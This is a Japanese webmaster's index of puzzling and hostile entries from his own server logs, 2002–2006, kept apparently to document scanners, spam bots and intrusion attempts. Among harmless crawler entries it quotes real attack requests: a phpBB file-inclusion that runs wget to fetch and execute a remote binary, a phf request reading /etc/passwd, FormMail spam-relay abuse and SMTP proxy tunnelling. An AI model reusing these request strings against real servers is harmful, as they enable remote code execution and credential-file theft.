I&U Home > うにまま(仮) ・  謎ログの友 ・  パスワードコレクション ・  FormMail Scanners

謎ログ index

all [apache] [exploit] [ftp] [robot] [webalizer] [SEO_SPAM] [others]

Mambo Serveの脆弱性を探るアクセス

Name:    69-56-146-210.theplanet.com
Address:  69.56.146.210

XMLRPCの脆弱性をさぐるアクセス

69.56.146.210 - - [01/Mar/2006:05:41:08 +0900] "POST /xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:09 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

phpMyAdmin

83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:37:12 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"

ELF_KAIGENT.C

221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.25.90.15 - - [20/Feb/2006:03:24:32 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

formmail

24.12.104.213 - - [12/Feb/2006:00:08:43 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
24.12.104.213 - - [12/Feb/2006:00:47:59 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"

inazuma

pl1051.nas926.o-tokyo.nttpc.ne.jp - - [29/Dec/2003:02:00:39 +0900] "GET /mokko/w64_06.gif HTTP/1.1" 200 1838 "http://inazuma/content?Type=Data&KIND=&PARAM=&QUERY=網戸+張替え&WATCH=&EXTRA=&URL=http://iandu.s7.xrea.com/mokko/amido.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
pl1051.nas926.o-tokyo.nttpc.ne.jp - - [29/Dec/2003:02:00:39 +0900] "GET /mokko/arrowu_1.gif HTTP/1.1" 200 944 "http://inazuma/content?Type=Data&KIND=&PARAM=&QUERY=網戸+張替え&WATCH=&EXTRA=&URL=http://iandu.s7.xrea.com/mokko/amido.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

/_vti_bin/_vti_aut/author.exe

a212-113-164-98.netcabo.pt - - [27/Dec/2003:06:40:33 +0900] "POST /_vti_bin/_vti_aut/author.exe HTTP/1.0" 302 210 "-" "MSFrontPage/4.0"
a212-113-164-98.netcabo.pt - - [27/Dec/2003:06:40:33 +0900] "POST /_vti_bin/_vti_aut/author.exe HTTP/1.0" 302 210 "-" "MSFrontPage/4.0"

"Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)"

216.88.158.142 - - [25/Dec/2003:00:51:29 +0900] "GET /~genome/links.html HTTP/1.1" 200 6280 "-" "Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)"

backlinks.seguru.net

64.239.138.76 - - [25/Dec/2003:04:52:10 +0900] "GET / HTTP/1.1" 200 1427 "backlinks.seguru.net/?link-popularity" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.2.19; i686)"

goo から Wget されたら

202.229.44.68 - - [15/Dec/2003:10:48:13 +0900] "GET /%7Emyhome/index.html HTTP/1.0" 200 2506 "-" "Wget/1.8.2"

usage/bookmarks を探す理由

193.55.10.104 - - [02/Dec/2003:01:30:43 +0900] "GET /~ppp/pppkey.html HTTP/1.0" 200 3736 "bookmarks" "Mozilla/4.5 [fr] (Macintosh; U; PPC)"host)
133.39.9.117 - - [06/Dec/2003:18:56:15 +0900] "GET /%7Eggggg/index.html HTTP/1.0" 200 2080 "bookmarks" "Mozilla/4.7 [ja] (Macintosh; U; PPC)"

UAにランダムな文字列を入れてくるブラウザ

adsl-211-228-28.mia.bellsouth.net - - [22/Nov/2003:15:47:54 +0900] "GET /unimama/logwatch.html HTTP/1.1" 200 101684 "-" "nyuspswpddxWmuskco dityxp"
adsl-211-228-28.mia.bellsouth.net - - [22/Nov/2003:17:56:16 +0900] "GET /unimama/logwatch.html HTTP/1.1" 200 101684 "-" "leymisgaoVmjsnxb lbmocpsiqsaVi"

HEAD /xyzzy

wooster.netcraft.com - - [19/Nov/2003:22:30:51 +0900] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/" "Mozilla/4.0  (compatible; Netcraft Web Server Survey)"
wooster.netcraft.com - - [19/Nov/2003:22:30:55 +0900] "HEAD /xyzzy HTTP/1.0" 302 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"

逆アクセスログランキングを狙った検索エンジンスパム

141.85.3.130 - - [17/Nov/2003:04:34:29 +0900] "GET / HTTP/1.0" 200 955 "http://www.saulem.com/" "MSIE 6.0"
141.85.3.130 - - [17/Nov/2003:11:10:10 +0900] "GET / HTTP/1.0" 200 955 "http://www.bongohome.com/" "MSIE 6.0"

FunWebProducts

195.93.32.8 - - [17/Nov/2003:00:59:35 +0900] "GET /~tttt/html/TT5.dmel0.mas.135.html HTTP/1.0" 200 2912 "XXXX:++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" "Mozilla/4.0 (compatible; MSIE 5.5; AOL 8.0; Windows NT 5.0; FunWebProducts)" 

偶然なんだろうけれど

Nov 17 11:43:15 myhost ftpd[25380]: FTPD: connection from defense-4-81-57-92-161.fbx.proxa at Mon Nov 17 11:43:15 2003
Nov 17 11:43:15 myhost ftpd[25380]: <--- 220 

自分の物でもないのに

219.117.176.252 - - [16/Nov/2003:00:21:50 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery" 
219.117.176.252 - - [16/Nov/2003:00:21:50 +0900] "OPTIONS /%7Eppp HTTP/1.1" 301 322 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery" 

検索エンジンはなぜ usage/bookmarks を探すのか?

216.39.48.112 - - [25/Oct/2003:12:10:43 +0900] "GET /~ppp/usage/bookmarks HTTP/1.1" 404 301 "-" "Scooter/3.2"
64.68.82.170 - - [25/Oct/2003:19:19:10 +0900] "GET /~ppp/usage/bookmarks HTTP/1.0" 404 289 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

msnbot/0.11 (+http://search.msn.com/msnbot.htm)

204.95.98.252 - - [04/Nov/2003:04:04:04 +0900] "GET /%7Eggggg/mailto/:gggg-admin/@mydomain.xxx.xxx.xxx.xxx HTTP/1.0" 404 321 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"

なぜうちに?

211.152.11.8 - - [02/Nov/2003:00:45:37 +0900] "GET /images2001/regobauble-b.gif HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 
211.152.11.8 - - [02/Nov/2003:01:43:45 +0900] "GET /images2001/clear.gif HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 

ten.com

そうじゃなくて・・・

128.255.116.124 - - [09/Oct/2003:01:30:44 +0900] "GET /~ppp/cgi-bin/PPP/PPPseqen.pl.cgi?A900534 > PPP_SEQUENCES/A900534.txt" 400 377 "-" "-" 
128.255.116.124 - - [09/Oct/2003:01:30:44 +0900] "GET /~ppp/cgi-bin/PPP/PPPseqen.pl.cgi?A900756 > PPP_SEQUENCES/A900756.txt" 400 377 "-" "-" 

お初にお目にかかったので:mkd _K4e

Oct  8 23:57:25 myhost ftpd[12560]: FTPD: connection from pD9E40E3F.dip.t-dialin.net at Wed Oct  8 23:57:25 2003
Oct  8 23:57:25 myhost ftpd[12560]: <--- 220 

だ〜か〜ら〜弾いたって言ってるの

203.162.167.98 - - [02/Oct/2003:14:18:16 +0900] "GET /unimama/httpscan.txt HTTP/1.0" 200 30853 "http://www.google.com.vn/search?q=PDG_Cart/order.log&hl=vi&lr=&ie=UTF-8&start=70&sa=N" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
203.162.167.98 - - [02/Oct/2003:14:19:34 +0900] "GET /cgi-bin/adpassword.txt HTTP/1.0" 302 210 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

/jf74kd

217.187.217.152 - - [30/Sep/2003:13:35:20 +0900] "GET /jf74kd HTTP/1.0" 404 278 "-" "-"

internal-gopher-xxxxx

Sep 30 06:11:39 myhost ftpd[9226]: FTPD: connection from gate2.sssss.org at Tue Sep 30 06:11:39 2003
Sep 30 06:11:39 myhost ftpd[9226]: <--- 220 

組み合わせの妙

210.51.181.114 - - [06/Sep/2003:16:12:55 +0900] "\x04\x01" 501 - "-" "-" 
210.51.181.114 - - [06/Sep/2003:16:13:15 +0900] "\x05\x01" 501 - "-" "-" 

スキャンスクリプト

212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-" 
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-" 

IE の文字コード判定を惑わせるページ

219.140.57.34 - - [30/Aug/2003:11:36:49 +0900] "GET /+AH4-ggg/cgi-bin/IMG/lblue.gif HTTP/1.1" 404 317 "http://mydomain.xxx.xxx.xxx/~ggg/cgi-bin/mas.pl.cgi?org=anab0&gene=icd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
219.140.57.34 - - [30/Aug/2003:11:36:49 +0900] "GET /+AH4-ggg/cgi-bin/IMG/blue.gif HTTP/1.1" 404 316 "http://mydomain.xxx.xxx.xxx/~ggg/cgi-bin/mas.pl.cgi?org=anab0&gene=icd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 

sitecheck.internetseer.com

66.150.40.66 - - [21/Aug/2003:02:11:37 +0900] "HEAD / HTTP/1.1" 200 0 "-" "sitecheck.internetseer.com (For more info see: http://sitecheck.internetseer.com)"
66.150.40.76 - - [19/Aug/2003:16:30:53 +0900] "GET /robots.txt HTTP/1.1" 200 187 "-" "sitecheck.internetseer.com (For more info see: http://sitecheck.internetseer.com)"

"GET /NULL.printer"

24.123.170.99 - - [08/Aug/2003:07:27:47 +0900] "GET /NULL.printer" 404 - "-" "-"

Webalizer を利用した検索エンジンスパム?(2)

212.123.66.62 - - [04/Aug/2003:12:56:10 +0900] "GET /~ppp/usage/usage_200307.html HTTP/1.1" 200 0 "http://www.top-penis-enlargement.com/" "Mozilla/2.0 (compatible; MSIE 3.0; AOL 4.0; Windows 3.1)"
211.114.118.254 - - [04/Aug/2003:12:57:50 +0900] "GET /~ppp/usage/usage_200307.html HTTP/1.0" 200 0 "http://www.top-penis-enlargement.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

Webalizer を利用した検索エンジンスパム?

ヘンなロボット

210.155.159.198 - - [05/Aug/2003:13:46:54 +0900] "GET /~ggggg/ftp.embl-ebi.ac.uk/pub/databases/ HTTP/1.0" 404 313 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)" 

トネリング狙い

12.218.107.176 - - [04/Aug/2003:18:28:57 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-" 
12.218.107.176 - - [04/Aug/2003:18:28:59 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-" 

ヘンなロボット?

61.214.65.109 - - [31/Jul/2003:20:54:12 +0900] "GET /sssss~/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
61.214.65.109 - - [31/Jul/2003:20:55:41 +0900] "GET /sssss~pub/ HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

"GET /scripts/nsiislog.dll" - MS03-019の脆弱性を狙った攻撃

211.181.212.10 - - [16/Jul/2003:08:56:32 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
80.139.104.127 - - [21/Jul/2003:10:47:04 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"

UA偽装ロボット

66.237.60.61 - - [25/Jul/2003:16:02:00 +0900] "GET /robots.txt HTTP/1.0" 200 187 "-" "Gaisbot/3.0+(robot@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" 66.237.60.61 - - [25/Jul/2003:20:16:29 +0900] "GET /&quot;&gt; HTTP/1.0" 404 290 "-" "Gaisbot/3.0+(robot@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"

Nikto/1.30によるスキャン

212.92.77.254 - - [24/Jul/2003:01:31:16 +0900] "GET / HTTP/1.1" 200 3923 "-" "libwhisker/1.6"
212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )"

proxy judge

142.177.228.186 - - [22/Jul/2003:17:28:26 +0900] "GET http://blackmarket.jp/cgi-bin/jeno/env/prxjdg.cgi HTTP/1.0" 404 299 "-" "Mozilla/3.0 (compatible)" 
142.177.228.186 - - [22/Jul/2003:22:59:30 +0900] "GET http://blackmarket.jp/cgi-bin/jeno/env/prxjdg.cgi HTTP/1.0" 404 299 "-" "Mozilla/3.0 (compatible)"

PHPスクリプトをさぐる動き

217.162.194.164 - - [17/Jul/2003:21:42:02 +0900] "GET / HTTP/1.0" 200 3923 "-" "-" 
217.162.194.164 - - [17/Jul/2003:21:42:05 +0900] "GET /index.php HTTP/1.0" 404 281 "-" "-" 

なぜ切り替わる?

Jul 20 06:35:25 myhost in.ftpd[5713]: connect from 80.178.5.154
Jul 20 06:35:36 myhost in.ftpd[5716]: connect from 80.178.5.154.forward.012.net.il

"CONNECT 1.3.3.7:1337 HTTP/1.0"

210.196.71.179 - - [15/Jul/2003:13:46:52 +0900] "CONNECT 1.3.3.7:1337 HTTP/1.0"405 309 "-" "-" 

"GET //r/n. HTTP/1.1"

61.209.171.119 - - [30/Jun/2003:20:32:58 +0900] "GET //r/n. HTTP/1.1" 404 286 "-" "Microsoft URL Control - 6.00.8862"

"LINK / HTTP/1.1"

163.152.159.70 - - [27/Jun/2003:20:47:39 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
163.152.159.70 - - [28/Jun/2003:12:56:09 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"

"GET /w3c/p3p.xml HTTP/1.1"

"GET /w3c/p3p.xml HTTP/1.1" 404 295 "-" "P3P Client" 

"GET /cfdocs/expeval/ExprCalc.cfm" Cold Fusion のサンプルスクリプトを狙った攻撃

212.202.40.10 - - [26/Jun/2003:07:10:26 +0900] "GET /cfdocs/expeval/ExprCalc.cfm HTTP/1.0" 404 299 "-" "-"

メール送信スクリプトを狙う攻撃

211.233.27.208 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.cgi HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
192.148.139.178 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.asp HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"

"SEARCH / HTTP/1.1"

203.15.69.139 - - [24/Jun/2003:07:17:12 +0900] "SEARCH / HTTP/1.1" 501 344 "-" "-"

パスワードリストによる攻撃

Jun 22 09:44:47 myhost ftpd[24002]: FTPD: connection from APlessis-Bouchard-101-2-1-53.w19 at Sun Jun 22 09:44:47 2003
Jun 22 09:44:47 myhost ftpd[24002]: <--- 220 

イタズラじゃないみたいだけど

131.107.163.50 - - [01/May/2003:13:57:18 +0900] "GET /~ggg-old/xxxxxx HTTP/1.1" 404 304 "-" "MicrosoftPrototypeCrawler (How's my crawling? mailto:newbiecrawler@hotmail.com)" 
131.107.163.50 - - [01/May/2003:13:57:23 +0900] "GET /~ggg-old/yyyyyy HTTP/1.1" 404 304 "-" "MicrosoftPrototypeCrawler (How's my crawling? mailto:newbiecrawler@hotmail.com)" 

しつこいスキャン

217.227.77.239 - - [30/Mar/2003:00:11:55 +0900] "HEAD / HTTP/1.0" 200 0 "-" "-" 
217.227.77.239 - - [30/Mar/2003:00:11:56 +0900] "GET /.pl HTTP/1.0" 404 275 "-" "-" 

間違ってるじゃん

218.68.216.7 - - [25/Feb/2003:08:50:09 +0900] "GET http://cancerres.aacrjournals.org/cgi/content/full/63/2/541 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows 98)"
218.68.216.7 - - [25/Feb/2003:12:49:06 +0900] "GET http://cancerres.aacrjournals.org/cgi/content/full/63/2/541 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows 98)"

anonymous@ftp.adobe.com

Feb 11 22:04:16 myhost ftpd[22755]: FTPD: connection from modemcable241.215-130-66.que.mc. at Tue Feb 11 22:04:16 2003
Feb 11 22:04:16 myhost ftpd[22755]: <--- 220 

ほんとにNaverなの?

218.145.25.49 - - [31/Dec/2002:21:41:57 +0900] "GET /?action=ad HTTP/1.0" 200 915 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [31/Dec/2002:21:41:57 +0900] "GET /?action=faq HTTP/1.0" 200 915 "-" "dloader(NaverRobot)/1.0"

ano@ano.com

"GET x HTTP/1.0"

219.93.206.130 - - [26/Nov/2002:01:43:29 +0900] "GET x HTTP/1.0" 400 334 "-" "-"

Microsoft URL Control - 6.00.8862

211.110.6.220 - - [23/Nov/2002:18:08:13 +0900] "GET /ftp:/mydmain/pub/ppp HTTP/1.1" 404 315 "-" "Microsoft URL Control - 6.00.8862" 
211.110.6.220 - - [23/Nov/2002:18:08:56 +0900] "GET /~ppp/ftp:/mydomain/pub/ppp HTTP/1.1" 404 320 "-" "Microsoft URL Control - 6.00.8862"

"-" 408 - "-" "-"

66.196.72.79 - - [09/Sep/2002:06:43:29 +0900] "-" 408 - "-" "-"
66.196.73.76 - - [09/Sep/2002:08:47:09 +0900] "-" 408 - "-" "-"

msadcs.dll

208.203.70.195 - - [08/Nov/2002:10:56:37 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-" 
208.203.70.195 - - [08/Nov/2002:10:56:38 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"

Pub Maker

Nov 10 14:05:20 myhost ftpd[22995]: FTPD: connection from pc-outside.uni-greifswald.de at Sun Nov 10 14:05:20 2002
Nov 10 14:05:20 myhost ftpd[22995]: <--- 220 

ano@ano.com go

粘着君

@here.com

Oct 25 03:22:54 myhost ftpd[24850]: FTPD: connection from ca-bordeaux-13-232.abo.wanadoo.f at Fri Oct 25 03:22:54 2002
Oct 25 03:22:54 myhost ftpd[24850]: <--- 220 

sss@

Oct 10 23:51:59 myhost ftpd[2723]: FTPD: connection from 213.226.134.110 at Thu Oct 10 23:51:59 2002
Oct 10 23:51:59 myhost ftpd[2723]: <--- 220 

今度はmailto.exe

217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /scripts/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/scripts/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /cgi-bin/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/cgi-bin/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

珍しい!!

130.34.78.86 - - [20/Sep/2002:11:29:35 +0900] "GET /~ggggg/favicon.ico HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 
130.34.78.86 - - [20/Sep/2002:11:29:35 +0900] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

ano ano com go

Sep 19 02:15:35 myhost ftpd[2300]: FTPD: connection from pD951ED19.dip.t-dialin.net at Thu Sep 19 02:15:35 2002

formmail ふたたび

80.3.64.5 - - [19/Sep/2002:06:54:41 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.0" 404 0 "http://mydomain/" "-" 
80.3.64.5 - - [19/Sep/2002:06:54:42 +0900] "HEAD /cgi-bin/formmail.cgi HTTP/1.1" 404 0 "http://mydomain/" "-"

行儀悪いんじゃ?

211.101.4.15 - - [16/Sep/2002:03:11:51 +0900] "GET /?action=signup HTTP/1.1" 302 298 "-" "Internet Explore 5.x"
211.101.4.15 - - [16/Sep/2002:03:11:51 +0900] "GET /?action=spec HTTP/1.1" 302 298 "-" "Internet Explore 5.x"

なぜうちに???

68.51.199.14 - - [12/Sep/2002:08:36:15 +0900] "GET /f.sb.gif HTTP/1.1" 404 292 "http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=365318a02b1caf1a79d75a731f7ec54c&msg=MSG1031786230.22&start=806672&len=2698" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 

refer偽造

209.142.168.7 - - [11/Sep/2002:08:22:25 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 "http://gib.genes.nig.ac.jp/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
209.142.168.7 - - [11/Sep/2002:08:22:29 +0900] "GET / HTTP/1.0" 200 3906 "http://mydomain/cgi-bin/formmail.pl" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

SuperScanの足跡

Sep  6 06:05:46 myhost ftpd[22667]: FTPD: connection from 217.172.194.74 at Fri Sep  6 06:05:46 2002
Sep  6 06:05:46 myhost ftpd[22667]: <--- 220 

FrontPage2000の脆弱性

NaverRobotったら

218.145.63.93 - - [06/Sep/2002:20:39:21 +0900] "GET /~7Eggggg/ HTTP/1.0" 404 282 "-" "dloader(NaverRobot)/1.0" 

気になる?

ps.melco.co.jp - - [27/Aug/2002:14:24:27 +0900] "GET /spec/server.html HTTP/1.0" 200 2258 "http://www.google.co.jp/search?q=CD-R+CD-RW+Windows2000+Server&hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&start=100&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; .NET CLR 1.0.3705)"

proxy サービスはしておりません

158.252.215.43 - - [21/Aug/2002:00:34:24 +0900] "CONNECT mx2.mail.yahoo.com:25 HTTP/1.0" 405 309 
213.37.58.178 - - [21/Aug/2002:15:35:52 +0900] "GET http://mytest.maddock.net/cgi-bin/myinfo HTTP/1.1" 404 298

お盆でお休みしている間に、、、アタックその2

お盆でお休みしている間に、、、アタックその1

検索

"GET /unimama/download.html HTTP/1.1" 200 4084 "http://apple.excite.co.jp/search.gw?target=combined&look=applejp_jp&lang=all&search=Stufflt+Expandar&pref=all" 

判明 408

分からん(2)

66.28.250.173 - - [26/Jul/2002:01:53:35 +0900] "GET /robots.txt HTTP/1.0" 200 187 66.28.250.173 - - [26/Jul/2002:01:53:35 +0900] "GET /&quot HTTP/1.0" 404 281

formmail続報

64.48.129.24 - - [15/Jul/2002:08:03:15 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291
64.48.129.24 - - [15/Jul/2002:08:03:19 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 292

機種名まで渡しているとは

[09/Jul/2002:10:02:17 +0900] "GET / HTTP/1.0" 200 339 "-" "DoCoMo/1.0/N503i/c10"

IEだけじゃなくって、NN7も favicon.ico を見るようになったらしい

[09/Jul/2002:00:25:19 +0900] "GET /favicon.ico HTTP/1.1" 302 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1"

分からん

65.116.145.138 - - [18/Apr/2002:03:13:17 +0900] "GET /%2016945926%2010000%202157 HTTP/1.1" 404 303 
65.116.145.138 - - [18/Apr/2002:03:16:41 +0900] "GET /%20185464%2010000%2028 HTTP/1.1" 404 296 

formmail.pl/formmail.cgiにセキュリティホールがあるらしい

24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.pl?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.pl&body=JupZ&email=srt@aol.com HTTP/1.1" 404 300
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.cgi?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.cgi&body=JupZ&email=mim@aol.com HTTP/1.1" 404 301

そんな、いきなり、、、

anonymous@ftp.microsoft.com 続報

踏み台攻撃?

Mar 10 06:23:37 myhost ftpd[3735]: FTPD: connection from modemcable091.124-202-24.mtl.mc. at Sun Mar 10 06:23:37 2002
Mar 10 06:23:37 myhost ftpd[3735]: <--- 220 

やっと判明??? "GET /_vti_bin/owssvr.dll", "GET /MSOffice/cltreq.asp"

"GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290
"GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290

なんでこんなことする?

"GET /pub/ppp HTTP/1.0" 404 278
"GET /pub/ppp HTTP/1.0" 404 278

気をつけよう

"GET /phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 274

新手?と思ったら、CodeRedのようです。 go

"GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290

何してるの? go

"GET x HTTP/1.0" 400 333

きっと '~' (チルダ) だろうけど、何をするとこうなるのかなぁ?

"GET /%E2%80%BEfoo/tools2.html HTTP/1.0" 404 290

最近現れるなぞの(おそらく)ロボット?

"-" 408 -

へんなログ発見

"..." 501 -
"GET HTTP://www.microsoft.com/ HTTP/1.0" 200 3895 (unknown host)

なぞじゃないけど、、、チルダが入力できない私の知り合い

"GET /%EF%BD%9Emydir/zenkoku.html HTTP/1.1" 404 305
"GET /%EF%BD%9Emydir/zenkoku.html HTTP/1.1" 404 305


I&U Home > うにまま(仮) ・  謎ログの友 ・  パスワードコレクション ・  FormMail Scanners